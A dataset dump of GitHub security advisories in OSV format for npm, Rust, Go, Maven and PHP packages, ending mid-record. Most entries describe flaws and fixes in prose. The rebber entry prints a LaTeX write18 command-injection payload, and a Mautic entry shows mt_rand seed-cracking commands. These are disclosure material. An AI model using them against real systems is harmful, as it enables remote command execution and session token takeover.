schema_version
stringclasses 1
value | id
stringlengths 19
19
| modified
stringlengths 20
20
| published
stringlengths 20
20
| withdrawn
stringlengths 20
20
⌀ | aliases
stringlengths 2
20
| summary
stringlengths 3
183
| details
stringlengths 9
12.9k
| severity
stringlengths 2
92
| affected
stringlengths 84
2.74k
| references
stringlengths 99
16.4k
| database_specific
stringlengths 131
210
|
---|---|---|---|---|---|---|---|---|---|---|---|
1.4.0 | GHSA-2c83-wfv3-q25f | 2021-09-07T14:04:47Z | 2021-09-07T23:07:56Z | null | [] | Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in ZMarkdown | ### Impact
A Remote Command Execution vulnerability was found in the rebber module,
which allowed execution of arbitrary commands. The reported problem came
from CodeBlocks, which could be escaped to insert malicious LaTeX.
Anyone using `rebber` without sanitation of code content or a custom
macro is impacted by this vulnerability. Here is an example of a Markdown
content that will exploit the vulnerability:
````markdown
```
\end{CodeBlock}
\immediate\write18{COMMAND > outputrce}
\input{outputrce}
\begin{CodeBlock}{text}
```
````
Will insert into the generated LaTeX the result of executing
`COMMAND` on the system.
### Patches
The vulnerability has been patched in version 5.2.1.
If impacted, you should update to this version as soon as possible.
### Workarounds
It is possible to mitigate the vulnerability without upgrading by using a
custom code macro. Please make sure this custom macro escapes your
closing LaTeX sequence. For the example above, use:
```javascript
const escaped = content.replace(new RegExp('\\\\end\\s*{CodeBlock}', 'g'), '')
```
### For more information
If you have any questions or comments about this advisory, open an issue in [ZMarkdown](https://github.com/zestedesavoir/zmarkdown/issues). | [] | [{'package': {'ecosystem': 'npm', 'name': 'rebber'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.1'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/zestedesavoir/zmarkdown/security/advisories/GHSA-2c83-wfv3-q25f'}, {'type': 'PACKAGE', 'url': 'https://github.com/zestedesavoir/zmarkdown'}] | {'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-07T14:04:47Z', 'nvd_published_at': None} |
1.4.0 | GHSA-97pv-4338-r5vp | 2021-09-07T18:05:06Z | 2021-09-07T23:08:54Z | null | ['CVE-2021-23439'] | Cross-site Scripting in file-upload-with-preview | This affects the package file-upload-with-preview before 4.2.0. A file containing malicious JavaScript code in the name can be uploaded (a user needs to be tricked into uploading such a file). | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'npm', 'name': 'file-upload-with-preview'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.0'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23439'}, {'type': 'WEB', 'url': 'https://github.com/johndatserakis/file-upload-with-preview/pull/40/files?file-filters%5B%5D=.js&hide-deleted-files=true%23diff-fe47b243de17419c0daa22cd785cd754baed60cf3679d3da1d6fe006f9f4a7f0R174'}, {'type': 'PACKAGE', 'url': 'https://github.com/johndatserakis/file-upload-with-preview'}, {'type': 'WEB', 'url': 'https://github.com/johndatserakis/file-upload-with-preview/blob/develop/src/file-upload-with-preview.js%23L168'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-FILEUPLOADWITHPREVIEW-1579492'}] | {'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-07T18:05:06Z', 'nvd_published_at': '2021-09-05T14:15:00Z'} |
1.4.0 | GHSA-x7g2-wrrp-r6h3 | 2023-05-01T22:18:02Z | 2021-09-01T18:41:06Z | null | ['CVE-2021-27913'] | Use of a Broken or Risky Cryptographic Algorithm | ## ✍️ Description
The function mt_rand is used to generate session tokens, this function is cryptographically flawed due to its nature being one pseudorandomness, an attacker can take advantage of the cryptographically insecure nature of this function to enumerate session tokens for accounts that are not under his/her control
## 🕵️♂️ Proof of Concept
Numerous examples and attack implementations can be found in this paper . If you're looking for a practical tool that can crack your mt_rand implementation's seed value, see this project and run the following commands in a console with php5 and OpenWall's tool installed:
`root$ php -r 'mt_srand(13333337); echo mt_rand( ), "\n";'`
After that, copy the output (1863134308) and execute the following commands:
`root$ gcc php_mt_seed.c -o php_mt_seedroot$ ./php_mt_seed 1863134308`
After waiting ~1 minute you should have a few possible seeds corresponding to their PHP versions, next to your installed PHP version you should see something akin to:
seed = 0x00cb7359 = 13333337 (PHP 7.1.0+)
Hey, that's your seed!
## 💥 Impact
An attacker could takeover accounts at random by enumerating and using access tokens.
## 📝 References
- https://openwall.com/php_mt_seedhttps://crypto.di.uoa.gr/CRYPTO.SEC/Randomness_Attacks_files/paper.pdf
- https://github.com/mautic/mautic/blob/5213e320b4ef4d0c51bb84c1d46a1071e8e4f7fc/app/bundles/PointBundle/Controller/TriggerController.php#L187
- https://github.com/mautic/mautic/releases/tag/3.3.4
- https://github.com/mautic/mautic/releases/tag/4.0.0 | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'mautic/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.4'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/mautic/mautic/security/advisories/GHSA-x7g2-wrrp-r6h3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27913'}, {'type': 'WEB', 'url': 'https://github.com/mautic/mautic/commit/d1cad766a2de74e6c6b89d6d78c2a5f2e36ba91c'}, {'type': 'PACKAGE', 'url': 'https://github.com/mautic/mautic'}] | {'cwe_ids': ['CWE-327'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T18:02:40Z', 'nvd_published_at': '2021-08-30T16:15:00Z'} |
1.4.0 | GHSA-mc22-5q92-8v85 | 2021-09-17T17:50:18Z | 2021-09-20T19:52:53Z | null | ['CVE-2021-39228'] | Memory Safety Issue when using patch or merge on state and assign the result back to state |
### Impact
This vulnerability is a memory safety Issue when using [`patch`](https://www.tremor.rs/docs/tremor-script/index#patch) or [`merge`](https://www.tremor.rs/docs/tremor-script/index#merge) on `state` and assign the result back to `state`.
In this case affected versions of Tremor and the [tremor-script crate](https://crates.io/crates/tremor-script) maintains references to memory that might have been freed already. And these memory regions can be accessed by retrieving the `state`, e.g. send it over TCP or HTTP. This requires the Tremor server (or any other program using tremor-script) to execute a tremor-script script that uses the mentioned language construct.
#### Details
If affects the following two tremor-script language constructs:
* A [Merge](https://www.tremor.rs/docs/tremor-script/index#merge) where we assign the result back to the target expression
and the expression to be merged needs to reference the `event`:
```
let state = merge state of event end;
```
* A [Patch](https://www.tremor.rs/docs/tremor-script/index#patch) where we assign the result back to the target expression
and the patch operations used need to reference the `event`:
```
let state = patch state of insert event.key => event.value end;
```
For constructs like this (it does not matter what it references in the expression to be merged or the patch operations) an optimization
was applied to manipulate the target value in-place, instead of cloning it.
Our `Value` struct, which underpins all event data in `tremor-script`, is representing strings as borrowed `beef::Cow<'lifetime, str>`,
that reference the raw data `Vec<u8>` the event is based upon. We keep this raw byte-array next to the `Value` structure inside our `Event` as a self-referential struct,
so we make sure that the structured `Value` and its references are valid across its whole lifetime.
The optimization was considered safe as long as it was only possible to merge or patch `event` data or static data.
When `state` was introduced to `tremor-script` (in version 0.7.3) a new possibility to keep `Value` data around for longer than the lifetime of an event emerged.
If `event` data is merged or patched into `state` without cloning it first, it can still reference keys or values from
the previous event, which will now be invalid. This allows access to those already freed regions of memory and to get their content out over the wire.
### Patches
The issue has been patched in https://crates.io/crates/tremor-script/0.11.6 and https://github.com/tremor-rs/tremor-runtime/releases/tag/v0.11.6 via commit [1a2efcd](https://github.com/tremor-rs/tremor-runtime/commit/1a2efcdbe68e5e7fd0a05836ac32d2cde78a0b2e) by removing the optimization
and always clone the target expression of a [Merge](https://www.tremor.rs/docs/tremor-script/index#merge) or [Patch](https://www.tremor.rs/docs/tremor-script/index#patch.
### Workarounds
If an upgrade is not possible, a possible workaround is to avoid the optimization
by introducing a temporary variable and not immediately reassigning to `state`:
```
let tmp = merge state of event end;
let state = tmp
```
### References
The actual fix is applied in this PR: https://github.com/tremor-rs/tremor-runtime/pull/1217
### For more information
If you have any questions or comments about this advisory:
* Open an issue on our repository [tremor-rs/tremor-runtime](https://github.com/tremor-rs/tremor-runtime)
* Please join our discord https://chat.tremor.rs and reach out to the team.
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'crates.io', 'name': 'tremor-script'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.7.3'}, {'fixed': '0.11.6'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/tremor-rs/tremor-runtime/security/advisories/GHSA-mc22-5q92-8v85'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39228'}, {'type': 'WEB', 'url': 'https://github.com/tremor-rs/tremor-runtime/pull/1217'}, {'type': 'WEB', 'url': 'https://github.com/tremor-rs/tremor-runtime/commit/1a2efcdbe68e5e7fd0a05836ac32d2cde78a0b2e'}, {'type': 'PACKAGE', 'url': 'https://github.com/tremor-rs/tremor-runtime'}, {'type': 'WEB', 'url': 'https://github.com/tremor-rs/tremor-runtime/releases/tag/v0.11.6'}] | {'cwe_ids': ['CWE-416', 'CWE-825'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-17T17:50:18Z', 'nvd_published_at': '2021-09-17T14:15:00Z'} |
1.4.0 | GHSA-x55w-vjjp-222r | 2022-08-10T23:43:58Z | 2021-09-29T17:12:19Z | null | ['CVE-2021-3820'] | inflect vulnerable to Inefficient Regular Expression Complexity | inflect is customizable inflections for nodejs. inflect is vulnerable to Inefficient Regular Expression Complexity | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'npm', 'name': 'i'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.7'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3820'}, {'type': 'WEB', 'url': 'https://github.com/pksunkara/inflect/commit/a9a0a8e9561c3487854c7cae42565d9652ec858b'}, {'type': 'PACKAGE', 'url': 'https://github.com/pksunkara/inflect'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/4612b31a-072b-4f61-a916-c7e4cbc2042a'}] | {'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-28T19:27:17Z', 'nvd_published_at': '2021-09-27T13:15:00Z'} |
1.4.0 | GHSA-ccw8-7688-vqx4 | 2022-08-10T23:49:51Z | 2021-09-08T20:14:48Z | null | ['CVE-2021-37219'] | HashiCorp Consul Privilege Escalation Vulnerability | HashiCorp Consul and Consul Enterprise 1.10.1 Raft RPC layer allows non-server agents with a valid certificate signed by the same CA to access server-only functionality, enabling privilege escalation. Fixed in 1.8.15, 1.9.9 and 1.10.2. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.10.1'}, {'fixed': '1.10.2'}]}], 'versions': ['1.10.1']}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9.0'}, {'fixed': '1.9.9'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.8.15'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37219'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/pull/10925'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/commit/3357e57dac9aadabd476f7a14973e47f003c4cf0'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/commit/473edd1764b6739e2e4610ea5dede4c2bc6009d1'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/commit/ccf8eb1947357434eb6e66303ddab79f4c9d4103'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2021-22-consul-raft-rpc-privilege-escalation/29024'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/consul'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202207-01'}, {'type': 'WEB', 'url': 'https://www.hashicorp.com/blog/category/consul'}] | {'cwe_ids': ['CWE-295'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-08T18:12:59Z', 'nvd_published_at': '2021-09-07T12:15:00Z'} |
1.4.0 | GHSA-vwhc-pww7-72x6 | 2021-08-31T20:25:52Z | 2021-09-01T18:24:05Z | null | ['CVE-2021-32831'] | Code Injection in total.js | Total.js framework (npm package total.js) is a framework for Node.js platfrom written in pure JavaScript similar to PHP's Laravel or Python's Django or ASP.NET MVC. In total.js framework before version 3.4.9, calling the utils.set function with user-controlled values leads to code-injection. This can cause a variety of impacts that include arbitrary code execution. This is fixed in version 3.4.9. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'npm', 'name': 'total.js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.9'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32831'}, {'type': 'WEB', 'url': 'https://github.com/totaljs/framework/commit/887b0fa9e162ef7a2dd9cec20a5ca122726373b3'}, {'type': 'PACKAGE', 'url': 'https://github.com/totaljs'}, {'type': 'WEB', 'url': 'https://github.com/totaljs/framework/blob/e644167d5378afdc45cb0156190349b2c07ef235/changes.txt#L11'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2021-066-totaljs-totaljs/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/total.js'}] | {'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-31T20:25:52Z', 'nvd_published_at': '2021-08-30T21:15:00Z'} |
1.4.0 | GHSA-f3rf-v9qm-9c89 | 2021-08-30T18:35:42Z | 2021-09-01T18:36:51Z | null | ['CVE-2021-36787'] | Cross-site Scripting in the femanager TYPO3 extension | The extension allows by default to upload SVG files when a logged in frontend user uploads a new profile image. This may lead to Cross-Site Scripting, when the uploaded SVG image is used as is on the website.
Note: If SVG uploads are required, it is recommended to use the TYPO3 extension svg_sanitizer (added to TYPO3 core since versions 9.5.28, 10.4.18 and 11.3.0) to prevent upload of malicious SVG files or to set up a strict Content Security Policy for the destination folder of uploaded images. | [] | [{'package': {'ecosystem': 'Packagist', 'name': 'in2code/femanager'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.5.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'in2code/femanager'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.3.1'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36787'}, {'type': 'WEB', 'url': 'https://github.com/in2code-de/femanager/commit/70f873c60f0e40ffd6a1300218ca368156fc1bf2'}, {'type': 'WEB', 'url': 'https://extensions.typo3.org/extension/femanager/'}, {'type': 'PACKAGE', 'url': 'https://github.com/in2code-de/femanager'}, {'type': 'WEB', 'url': 'https://github.com/in2code-de/femanager/releases/tag/6.3.1'}, {'type': 'WEB', 'url': 'https://typo3.org/help/security-advisories/security'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2021-010'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/165675/TYPO3-femanager-6.3.0-Cross-Site-Scripting.html'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2022/Jan/53'}] | {'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T18:35:42Z', 'nvd_published_at': '2021-08-13T17:15:00Z'} |
1.4.0 | GHSA-8mjx-h23h-w2pg | 2023-06-13T20:52:43Z | 2021-09-01T18:30:44Z | null | ['CVE-2021-28034'] | Double free in stack_dst | Affected versions of stack_dst used a push_inner function that increased the internal length of the array and then called val.clone(). If the val.clone() call panics, the stack could drop an already dropped element or drop uninitialized memory. This issue was fixed in `2a4d538` by increasing the length of the array after elements are cloned. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'crates.io', 'name': 'stack_dst'}, 'ecosystem_specific': {'affected_functions': ['stack_dst::StackA::push_cloned']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.1'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28034'}, {'type': 'WEB', 'url': 'https://github.com/thepowersgang/stack_dst-rs/issues/5'}, {'type': 'WEB', 'url': 'https://github.com/thepowersgang/stack_dst-rs/commit/2a4d538'}, {'type': 'WEB', 'url': 'https://github.com/thepowersgang/stack_dst-rs/commit/2a4d53809e3000f40085f2b229b6b1a33759881d'}, {'type': 'PACKAGE', 'url': 'https://github.com/thepowersgang/stack_dst-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0033.html'}] | {'cwe_ids': ['CWE-415'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T21:56:32Z', 'nvd_published_at': '2021-03-05T09:15:00Z'} |
1.4.0 | GHSA-7322-jrq4-x5hf | 2021-09-29T18:04:31Z | 2021-09-29T17:09:40Z | null | ['CVE-2021-41106'] | File reference keys leads to incorrect hashes on HMAC algorithms | ### Impact
Users of HMAC-based algorithms (HS256, HS384, and HS512) combined with `Lcobucci\JWT\Signer\Key\LocalFileReference` as key are having their tokens issued/validated using the file path as hashing key - instead of the contents.
The HMAC hashing functions take any string as input and, since users can issue and validate tokens, people are lead to believe that everything works properly.
### Patches
All versions have been patched to always load the file contents, deprecated the `Lcobucci\JWT\Signer\Key\LocalFileReference`, and suggest `Lcobucci\JWT\Signer\Key\InMemory` as the alternative.
### Workarounds
Use `Lcobucci\JWT\Signer\Key\InMemory` instead of `Lcobucci\JWT\Signer\Key\LocalFileReference` to create the instances of your keys:
```diff
-use Lcobucci\JWT\Signer\Key\LocalFileReference;
+use Lcobucci\JWT\Signer\Key\InMemory;
-$key = LocalFileReference::file(__DIR__ . '/public-key.pem');
+$key = InMemory::file(__DIR__ . '/public-key.pem');
``` | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'lcobucci/jwt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.4.0'}, {'fixed': '3.4.6'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'lcobucci/jwt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'lcobucci/jwt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.5'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41106'}, {'type': 'WEB', 'url': 'https://github.com/lcobucci/jwt/commit/8175de5b841fbe3fd97d2d49b3fc15c4ecb39a73'}, {'type': 'WEB', 'url': 'https://github.com/lcobucci/jwt/commit/c45bb8b961a8e742d8f6b88ef5ff1bd5cca5d01c'}, {'type': 'PACKAGE', 'url': 'https://github.com/lcobucci/jwt'}] | {'cwe_ids': ['CWE-345'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-28T21:27:18Z', 'nvd_published_at': '2021-09-28T21:15:00Z'} |
1.4.0 | GHSA-xpwj-7v8q-mcgj | 2022-08-11T16:54:03Z | 2021-09-23T23:18:03Z | null | ['CVE-2021-32619'] | Deno's static imports inside dynamically imported modules do not adhere to permission checks | ### Impact
Modules that are dynamically imported through `import()` or `new Worker` might have been able to bypass network and file system permission checks when statically importing other modules. In Deno 1.5.x and 1.6.x only programs dynamically importing (especially transitively) untrusted code are affected. In Deno 1.7.x all programs importing (especially transitively) untrusted code are affected.
In effect an attacker in control of a (possibly remote) module in a programs module graph has been able to, **irrespective of permissions**:
1. initiate GET requests to arbitrary URLs on the internet (including LAN) and possibly read (parts of) the contents of these resources.
2. check for existence of arbitrary paths on the file system, and possibly read (parts of) the contents of these files.
In Deno 1.5.x (October 27th, 2020) and Deno 1.6.x (December 8th, 2020) the attacker module had to have been granted permissions to load dynamically through the network / fs read permission. Since Deno 1.7.x (January 19th, 2021) this vulnerability was able to be exploited in a fully sandboxed isolate (without any permissions). This vulnerability was not present in releases prior to 1.5.0.
Arbitrary non-GET requests, control over request headers, or file system writes are not possible through this vulnerability. Users of the `deno_core`, `deno_runtime`, or other `deno_*` crates are not affected. This is a Deno CLI only vulnerability.
We are relatively confident this was not abused in the wild, as by default Deno prints out a green "Download" message when remote imports are downloaded, and this would have caused suspicion if it occurred in the middle of a programs execution. This message can be silenced with the `--quiet` flag.
### Patches
The vulnerability has been patched in Deno release 1.10.2. You can upgrade to the latest Deno version by running the `deno upgrade` command. The release is available through all official download channels.
### Workarounds
There is no workaround for this issue.
### For more information
If you have any questions or comments about this advisory:
* Open an issue on [the issue tracker](https://github.com/denoland/deno)
* Discuss on [Discord](https://discord.gg/deno)
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'crates.io', 'name': 'deno'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.10.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.10.1'}}] | [{'type': 'WEB', 'url': 'https://github.com/denoland/deno/security/advisories/GHSA-xpwj-7v8q-mcgj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32619'}, {'type': 'PACKAGE', 'url': 'https://github.com/denoland/deno'}] | {'cwe_ids': ['CWE-285', 'CWE-863'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-23T21:13:15Z', 'nvd_published_at': '2021-05-28T21:15:00Z'} |
1.4.0 | GHSA-468q-v4jj-485h | 2021-09-20T20:00:02Z | 2021-09-20T20:09:59Z | null | ['CVE-2021-3804'] | Inefficient Regular Expression Complexity in taro | taro is vulnerable to Inefficient Regular Expression Complexity | [{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'npm', 'name': '@tarojs/helper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.9'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3804'}, {'type': 'WEB', 'url': 'https://github.com/nervjs/taro/commit/acadb6c826ba57f2030a626f1de4f7b4608fcdb5'}, {'type': 'PACKAGE', 'url': 'https://github.com/nervjs/taro'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/0ebe85e6-cc85-42b8-957e-18d8df277414'}] | {'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-20T20:00:02Z', 'nvd_published_at': '2021-09-17T07:15:00Z'} |
1.4.0 | GHSA-xm9m-2vj8-fmfr | 2021-08-30T21:56:39Z | 2021-09-01T18:30:40Z | null | ['CVE-2021-28029'] | Uninitialized memory access in toodee | An issue was discovered in the toodee crate before 0.3.0 for Rust. The row-insertion feature allows attackers to read the contents of uninitialized memory locations. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}] | [{'package': {'ecosystem': 'crates.io', 'name': 'toodee'}, 'ecosystem_specific': {'affected_functions': ['toodee::TooDee::insert_row']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.0'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28029'}, {'type': 'WEB', 'url': 'https://github.com/antonmarsden/toodee/issues/13'}, {'type': 'PACKAGE', 'url': 'https://github.com/antonmarsden/toodee'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0028.html'}] | {'cwe_ids': ['CWE-908'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T21:56:39Z', 'nvd_published_at': '2021-03-05T09:15:00Z'} |
1.4.0 | GHSA-q897-9jxf-jg9r | 2021-09-20T20:18:29Z | 2021-09-10T17:56:23Z | null | ['CVE-2021-37579'] | Security check skip in Apache Dubbo | The Dubbo Provider will check the incoming request and the corresponding serialization type of this request meet the configuration set by the server. But there's an exception that the attacker can use to skip the security check (when enabled) and reaching a deserialization operation with native java serialization. Apache Dubbo 2.7.13, 3.0.2 fixed this issue by quickly fail when any unrecognized request was found. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.apache.dubbo:dubbo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7.13'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.dubbo:dubbo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.2'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37579'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/dubbo'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r898afa109cdbb4b79724308648ff0718152ebe1d3d6dfc7202d958bc%40%3Cdev.dubbo.apache.org%3E'}] | {'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-10T16:49:29Z', 'nvd_published_at': '2021-09-09T08:15:00Z'} |
1.4.0 | GHSA-72hm-fx78-xwhc | 2021-08-30T18:05:52Z | 2021-09-01T18:40:40Z | null | ['CVE-2021-27911'] | XSS vulnerability on contacts view | ### Impact
Mautic versions before 3.3.4/4.0.0 are vulnerable to an inline JS XSS attack through the contact's first or last name and triggered when viewing a contact's details page then clicking on the action drop down and hovering over the Campaigns button. Contact first and last name can be populated from different sources such as UI, API, 3rd party syncing, forms, etc.
### Patches
Upgrade to 3.3.4 or 4.0.0
### Workarounds
No
### References
https://github.com/mautic/mautic/releases/tag/3.3.4
https://github.com/mautic/mautic/releases/tag/4.0.0
### For more information
If you have any questions or comments about this advisory:
* Email us at [security@mautic.org](mailto:security@mautic.org)
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'mautic/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.4'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/mautic/mautic/security/advisories/GHSA-72hm-fx78-xwhc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27911'}, {'type': 'PACKAGE', 'url': 'https://github.com/mautic/mautic'}] | {'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T18:05:52Z', 'nvd_published_at': '2021-08-30T16:15:00Z'} |
1.4.0 | GHSA-grg4-wf29-r9vv | 2022-02-08T20:39:51Z | 2021-09-09T17:11:21Z | null | ['CVE-2021-37136'] | Bzip2Decoder doesn't allow setting size restrictions for decompressed data | ### Impact
The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression).
All users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack
### Workarounds
No workarounds other than not using the `Bzip2Decoder`
### References
Relevant code areas:
https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L80
https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L294
